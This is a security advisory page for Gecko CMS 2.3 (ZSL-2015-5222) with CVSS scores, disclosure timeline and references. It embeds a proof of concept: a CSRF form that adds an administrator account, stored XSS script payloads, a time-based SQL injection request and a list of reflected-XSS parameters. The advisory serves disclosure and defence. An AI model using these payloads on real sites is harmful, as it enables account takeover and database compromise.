Lucene search

Gjoko KrsticZSL-2015-5222

HistoryJan 12, 2015 - 12:00 a.m.

Gecko CMS 2.3 Multiple Vulnerabilities

2015-01-1200:00:00

Gjoko Krstic

zeroscience.mk

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.6%

JSON

Title: Gecko CMS 2.3 Multiple Vulnerabilities
Advisory ID: ZSL-2015-5222
Type: Local/Remote
Impact: Cross-Site Scripting, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 12.01.2015

Summary

Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been build to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast!

Description

Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection.

Vendor

JAKWEB - <http://www.cmsgecko.com>

Affected Version

2.3 and 2.2

Tested On

Apache/2
PHP/5.4.36

Vendor Status

[27.12.2014] Vulnerabilities discovered.
[05.01.2015] Vendor contacted.
[06.01.2015] Vendor responds asking more details.
[06.01.2015] Sent details to the vendor.
[06.01.2015] Vendor confirms issues but is not going to develop a fix because the issues are present in the admin panel (authd).
[12.01.2015] Public security advisory released.

PoC

geckocms_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.exploit-db.com/exploits/35767/>
[2] <http://packetstormsecurity.com/files/129929>
[3] <http://cxsecurity.com/issue/WLB-2015010058>
[4] <http://osvdb.org/show/osvdb/116966>
[5] <http://osvdb.org/show/osvdb/116967>
[6] <http://osvdb.org/show/osvdb/116968>
[7] <http://osvdb.org/show/osvdb/116969>
[8] <http://osvdb.org/show/osvdb/116970>
[9] <http://www.securityfocus.com/bid/72085>
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1422>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1423>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1424>
[13] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1422>
[14] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1423>
[15] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1424>
[16] <http://xforce.iss.net/xforce/xfdb/99974>
[17] <http://xforce.iss.net/xforce/xfdb/99975>
[18] <http://xforce.iss.net/xforce/xfdb/99976>
[19] <http://xforce.iss.net/xforce/xfdb/99977>

Changelog

[12.01.2015] - Initial release
[14.01.2015] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]
[23.01.2015] - Added reference [9]
[30.01.2015] - Added reference [10], [11], [12], [13], [14], [15], [16], [17], [18] and [19]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Gecko CMS 2.3 Multiple Vulnerabilities


Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2

Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!

Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.

Tested on: Apache/2
           PHP/5.4.36


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php


27.12.2014

---


CSRF Add Admin:
===============


</p>
<form action="http://demo.cmsgecko.com/admin/index.php?p=user&amp;sp=newuser" method="POST">
<input name="jak_name" type="hidden" value="Testingus2"/>
<input name="jak_email" type="hidden" value="[email protected]"/>
<input name="jak_username" type="hidden" value="Testusername2"/>
<input name="jak_usergroup" type="hidden" value="3"/>
<input name="jak_access" type="hidden" value="1"/>
<input name="jak_password" type="hidden" value="123123"/>
<input name="jak_confirm_password" type="hidden" value="123123"/>
<input name="save" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>



usergroup 4 = moderator
          3 = administrator
          2 = member standard
          1 = guest
          5 = banned



Stored XSS (params: jak_img, jak_name, jak_url):
================================================

POST http://demo.cmsgecko.com/admin/index.php?p=categories&amp;sp=newcat HTTP/1.1

jak_catparent	0
jak_catparent2	0
jak_footer	1
jak_img	"&gt;<script>alert(1);</script>
jak_lcontent	<p>test</p>
jak_lcontent2	
jak_menu	1
jak_name	"&gt;<script>alert(2);</script>
jak_name2	
jak_url	"&gt;<script>alert(3);</script>
jak_varname	ZSL
save	



SQL Injection (params: jak_delete_log[], ssp):
==============================================

POST /admin/index.php?p=logs&amp;sp=s HTTP/1.1

delete=&amp;jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&amp;jak_delete_log%5B%5D=2&amp;jak_delete_log%5B%5D=1

--

GET /admin/index.php?p=logs&amp;sp=delete&amp;ssp=3[SQLi] HTTP/1.1



Reflected XSS:
==============

/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
</body></html>

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.6%

JSON

Related for ZSL-2015-5222